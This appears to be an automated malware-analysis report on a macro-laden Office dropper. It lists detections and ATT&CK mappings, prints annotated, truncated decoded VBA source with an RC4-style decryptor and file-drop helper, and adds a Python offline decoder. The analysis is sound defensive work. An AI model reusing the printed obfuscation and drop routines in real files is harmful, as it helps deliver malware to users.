Verdict: MALICIOUS
Risk Score: 170
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate or Decode Files or Information
T1071.001 Web Protocols
The sample is a malicious Office document carrying obfuscated VBA macros (randomised identifiers such as c7C, bCEAD and i472E14, and constants assembled byte by byte). The decoded source shows a decryption routine, c7C, whose loop body has the structure of the RC4 keystream generator (PRGA): increment i, add S[i] to j, swap S[i] and S[j], and combine each data byte with S[(S[i] + S[j]) mod 256]. The arithmetic is done through two helpers: i472E14, a hand-rolled XOR written as (a And Not b) Or (Not a And b), and n666FC7, evidently a modulo-256 reduction (its body is outside the preview). The state table gCC3CF (255 slots) is filled out of order by hundreds of single assignments and contains repeated values (5 and 77 each occur several times), so it is not a true RC4 permutation but a custom variant. A file-write helper bCEAD (Open ... For Output / Print #1) and an Environ() wrapper mA93D2 are consistent with writing the decoded data to a path built from an environment variable. GetObject and CallByName are also flagged below; that pairing is commonly used to obtain a COM or WMI object and invoke a method on it without the method name appearing as a literal. The ClamAV signature Doc.Dropper.Agent-6517847-0 points to dropper behaviour: decode a second-stage payload, write it to disk and execute it. Note that the only URL extracted (http://schemas.openxmlformats.org/drawingml/2006/main) is the DrawingML XML namespace from the document body, not a download location, and no network call is visible in the previewed macro code; any web download behind the T1071.001 mapping should be confirmed by decoding the payload or by dynamic analysis.
Heuristics (6)

| Heuristic | Severity | Rule ID | Detail |
|---|---|---|---|
| ClamAV: Doc.Dropper.Agent-6517847-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Dropper.Agent-6517847-0 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (3 related findings) |
| GetObject call | high | OLE_VBA_GETOBJ | GetObject call |
| CallByName call | high | OLE_VBA_CALLBYNAME | CallByName call |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body) |
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9189 bytes | cf56c83e707b9ee2d94dc5a43db6b0ccbe11da56e6254f29388296a7ccb204e2 |

Preview: first 1,000 lines of the extracted script (truncated; lines starting with "' analyst note:" are annotations added in review, not part of the sample)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "InkEdit1, 0, 0, INKEDLib, InkEdit"

Dim i41BE

' analyst note: RC4-style keystream generator (PRGA) run over the caller-supplied
' byte table oB2E104. n666FC7 (body not in preview) is evidently a mod-256 helper,
' i472E14 is XOR. yFD79A is the INCLUSIVE last index of o05 to process.
Private Function c7C(o05() As Byte, oB2E104(), yFD79A)
    On Error Resume Next
    Dim hBD7(0 To 255), f9DCD1, l283, g3B, k39 As Byte
    For f9DCD1 = 0 To 255
        hBD7(f9DCD1) = oB2E104(f9DCD1)
    Next
    f9DCD1 = 0
    For f9DCD1 = 0 To yFD79A
        l283 = n666FC7((l283 + 1), 256)
        g3B = n666FC7((g3B + hBD7(l283)), 256)
        k39 = hBD7(l283)
        hBD7(l283) = hBD7(g3B)
        hBD7(g3B) = k39
        o05(f9DCD1) = i472E14(o05(f9DCD1), (hBD7(n666FC7((hBD7(l283) + hBD7(g3B)), 256))))
    Next f9DCD1
    c7C = StrConv(o05, 64)
End Function

' analyst note: writes a string to an arbitrary path (file-drop helper)
Private Function bCEAD(qF23, zFC8B4)
    Open qF23 For Output As #1
    Print #1, zFC8B4
    Close #1
End Function

' analyst note: XOR spelled out as (a And Not b) Or (Not a And b)
Private Function i472E14(k9DA6B, r7C1)
    i472E14 = (k9DA6B And Not r7C1) Or (Not k9DA6B And r7C1)
End Function

' analyst note: Environ() wrapper; source of the OLE_VBA_ENVIRON heuristic
Private Function mA93D2(gB08150)
    mA93D2 = Environ(gB08150)
End Function

Sub iADA19()
    ' analyst note: the six bytes, in index order, spell the ASCII string "0A0876"
    Dim o8F2EE(5) As Byte
    o8F2EE(4) = 55
    o8F2EE(2) = 48
    o8F2EE(1) = 65
    o8F2EE(3) = 56
    o8F2EE(5) = 54
    o8F2EE(0) = 48
    ' analyst note: 255-slot state table for c7C, populated out of order; values
    ' repeat (e.g. 5 and 77), so it is not a true RC4 permutation
    Dim gCC3CF(254) As Byte
    gCC3CF(65) = 126
    gCC3CF(143) = 131
    gCC3CF(28) = 246
    gCC3CF(95) = 5
    gCC3CF(232) = 35
    gCC3CF(181) = 244
    gCC3CF(223) = 70
    gCC3CF(184) = 212
    gCC3CF(41) = 31
    gCC3CF(137) = 110
    gCC3CF(166) = 169
    gCC3CF(57) = 35
    gCC3CF(64) = 165
    gCC3CF(46) = 5
    gCC3CF(217) = 161
    gCC3CF(128) = 123
    gCC3CF(185) = 154
    gCC3CF(136) = 1
    gCC3CF(2) = 198
    gCC3CF(12) = 107
    gCC3CF(147) = 140
    gCC3CF(18) = 77
    gCC3CF(9) = 114
    gCC3CF(14) = 169
    gCC3CF(97) = 138
    gCC3CF(218) = 237
    gCC3CF(173) = 228
    gCC3CF(53) = 98
    gCC3CF(179) = 202
    gCC3CF(63) = 24
    gCC3CF(145) = 134
    gCC3CF(235) = 227
    gCC3CF(100) = 164
    gCC3CF(59) = 167
    gCC3CF(16) = 157
    gCC3CF(133) = 195
    gCC3CF(160) = 46
    gCC3CF(183) = 210
    gCC3CF(11) = 114
    gCC3CF(104) = 212
    gCC3CF(7) = 138
    gCC3CF(119) = 216
    gCC3CF(191) = 140
    gCC3CF(244) = 109
    gCC3CF(88) = 4
    gCC3CF(91) = 233
    gCC3CF(24) = 104
    gCC3CF(106) = 58
    gCC3CF(30) = 16
    gCC3CF(114) = 151
    gCC3CF(20) = 167
    gCC3CF(192) = 44
    gCC3CF(153) = 120
    gCC3CF(155) = 4
    gCC3CF(225) = 85
    gCC3CF(161) = 99
    gCC3CF(125) = 79
    gCC3CF(197) = 91
    gCC3CF(205) = 216
    gCC3CF(89) = 96
    gCC3CF(0) = 70
    gCC3CF(110) = 186
    gCC3CF(249) = 213
    gCC3CF(8) = 145
    gCC3CF(105) = 22
    gCC3CF(108) = 14
    gCC3CF(126) = 116
    gCC3CF(1) = 180
    gCC3CF(54) = 4
    gCC3CF(10) = 213
    gCC3CF(15) = 2
    gCC3CF(214) = 85
    gCC3CF(107) = 194
    gCC3CF(90) = 146
    gCC3CF(6) = 209
    gCC3CF(5) = 77
    gCC3CF(19) = 53
    gCC3CF(222) = 78
    gCC3CF(233) = 77
    gCC3CF(39) = 139
    gCC3CF(240) = 109
    gCC3CF(208) = 51
    gCC3CF(247) = 50
    gCC3CF(149) = 206
    gCC3CF(51) = 161
    gCC3CF(229) = 223
    gCC3CF(203) = 86
    gCC3CF(167) = 31
    gCC3CF(44) = 229
    gCC3CF(81) = 86
    gCC3CF(66) = 253
    gCC3CF(226) = 51
    gCC3CF(40) = 150
    gCC3CF(210) = 227
    gCC3CF(79) = 77
    gCC3CF(115) = 73
    gCC3CF(98) = 86
    gCC3CF(101) = 154
    gCC3CF(162) = 244
    gCC3CF(220) = 115
    gCC3CF(94) = 205
    gCC3CF(58) = 76
    gCC3CF(238) = 168
    gCC3CF(228) = 128
    gCC3CF(123) = 46
    gCC3CF(42) = 167
    gCC3CF(144) = 69
    gCC3CF(158) = 192
    gCC3CF(4) = 111
    gCC3CF(72) = 250
    gCC3CF(17) = 243
    gCC3CF(99) = 23
    gCC3CF(177) = 111
    gCC3CF(71) = 245
    gCC3CF(224) = 91
    gCC3CF(86) = 117
    gCC3CF(172) = 192
    gCC3CF(78) = 67
    gCC3CF(159) = 169
    gCC3CF(50) = 228
    gCC3CF(25) = 57
    gCC3CF(170) = 183
    gCC3CF(178) = 113
    gCC3CF(174) = 139
    gCC3CF(234) = 119
    gCC3CF(142) = 116
    gCC3CF(129) = 119
    gCC3CF(87) = 185
    gCC3CF(85) = 224
    gCC3CF(67) = 52
    gCC3CF(118) = 5
    gCC3CF(189) = 5
    gCC3CF(248) = 23
    gCC3CF(56) = 138
    gCC3CF(60) = 115
    gCC3CF(165) = 59
    gCC3CF(37) = 210
    gCC3CF(62) = 187
    gCC3CF(198) = 33
    gCC3CF(84) = 236
    gCC3CF(168) = 238
    gCC3CF(227) = 25
    gCC3CF(152) = 37
    gCC3CF(213) = 168
    gCC3CF(242) = 234
    gCC3CF(243) = 126
    gCC3CF(176) = 224
    gCC3CF(70) = 65
    gCC3CF(29) = 241
    gCC3CF(236) = 44
    gCC3CF(141) = 117
    gCC3CF(237) = 187
    gCC3CF(45) = 169
    gCC3CF(75) = 123
    gCC3CF( ... (truncated)
```
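As an added worked example (written for this review, not part of the report or of the sample), the following Python mirrors the c7C routine so an analyst can decode the embedded data offline once the complete gCC3CF table and the ciphertext have been recovered from the full macros.bas. Two things are assumed: the helper n666FC7, whose body is outside the preview, is modelled as x mod 256 from its call sites, and i472E14 is XOR, which is exactly what the visible (a And Not b) Or (Not a And b) computes. The parse_byte_table helper reassembles a byte array from the macro's shuffled one-slot-at-a-time assignments; SAMPLE_VBA is a constructed miniature in that style and is not the sample's real data. The example goes slightly beyond the sample in two ways: it shows that, fed a genuine RC4 permutation, c7C is textbook RC4 (checked against a public test vector), and that with any table at all the transform is its own inverse, so the same routine decrypts what it encrypted.

```python
"""Offline re-implementation of the macro's c7C decryption routine (review example)."""
from __future__ import annotations

import re
from typing import Sequence


def rc4_ksa(key: bytes) -> list[int]:
    """Standard RC4 key scheduling; returns the 256-entry permutation S."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def vba_c7c(data: bytes, table: Sequence[int], last_index: int) -> bytes:
    """Mirror of c7C(o05, oB2E104, yFD79A) from the extracted macro.

    data       -> o05       buffer transformed in place
    table      -> oB2E104   caller-supplied byte table (gCC3CF in the sample)
    last_index -> yFD79A    INCLUSIVE upper bound of the VBA For loop

    Assumptions (not visible in the preview): n666FC7(x, 256) is x mod 256;
    i472E14 is XOR, as its And/Not/Or body shows.
    """
    if not 0 <= last_index < len(data):
        raise ValueError("last_index must address a byte inside data")
    # hBD7 is a 256-slot Variant array copied from table[0..255] under
    # 'On Error Resume Next'. gCC3CF has only 255 slots (Dim gCC3CF(254)), so
    # the read of index 255 fails silently and that slot stays Empty, which
    # VBA arithmetic treats as 0. Zero-padding reproduces that behaviour.
    s = [table[k] & 0xFF if k < len(table) else 0 for k in range(256)]
    out = bytearray(data)
    i = j = 0  # l283 and g3B are never initialised: Empty, i.e. 0
    for n in range(last_index + 1):  # VBA 'For 0 To yFD79A' is inclusive
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] ^= s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


_ASSIGN = re.compile(r"\b(\w+)\((\d+)\)\s*=\s*(\d+)")


def parse_byte_table(vba_src: str, name: str) -> list[int]:
    """Rebuild a byte array that the macro fills one slot at a time in shuffled
    order ('name(idx) = value'), as the sample does for gCC3CF and o8F2EE.
    Slots never assigned keep the VBA Byte default of 0."""
    entries = {int(i): int(v) for n, i, v in _ASSIGN.findall(vba_src) if n == name}
    if not entries:
        raise ValueError(f"no assignments to {name} found")
    # 'Dim name(N)' declares N+1 slots (lower bound 0). If the excerpt lacks
    # the Dim, fall back to the highest index that was assigned.
    dim = re.search(rf"\bDim\s+{re.escape(name)}\((\d+)\)", vba_src)
    size = int(dim.group(1)) + 1 if dim else max(entries) + 1
    return [entries.get(k, 0) for k in range(size)]


# Constructed miniature in the macro's style; NOT the sample's real table data.
SAMPLE_VBA = """
Dim tbl(7) As Byte
tbl(3) = 17
tbl(0) = 9
tbl(6) = 250
tbl(1) = 33
Dim key(2) As Byte
key(1) = 65
key(0) = 48
key(2) = 48
"""


def check_standard_rc4() -> bool:
    """Fed a genuine RC4 permutation, c7C is plain RC4 and must reproduce the
    public test vector key 'Key' / plaintext 'Plaintext' -> BBF316E8D940AF0AD3."""
    pt = b"Plaintext"
    return vba_c7c(pt, rc4_ksa(b"Key"), len(pt) - 1) == bytes.fromhex("BBF316E8D940AF0AD3")


def check_involution(table: Sequence[int], msg: bytes) -> bool:
    """The keystream depends only on the table, never on the data, so applying
    c7C twice with the same table restores the input for any table."""
    n = len(msg) - 1
    return vba_c7c(vba_c7c(msg, table, n), table, n) == msg


if __name__ == "__main__":
    tbl = parse_byte_table(SAMPLE_VBA, "tbl")
    print("tbl =", tbl)
    print("key bytes as text:", bytes(parse_byte_table(SAMPLE_VBA, "key")).decode("ascii"))
    print("RC4 test vector reproduced:", check_standard_rc4())
    print("double application restores input:", check_involution(tbl, b"constructed payload"))
```

To use it on the real sample, run parse_byte_table over the complete macros.bas for gCC3CF, locate the buffer that the macro passes to c7C together with its UBound, and call vba_c7c. The macro finishes with StrConv(o05, 64), i.e. vbUnicode, which treats the decoded bytes as ANSI text; the Python equivalent is .decode() with the system ANSI code page (cp1252 on most Western Windows installs), and that decoded text is what the file-drop helper bCEAD would write to disk.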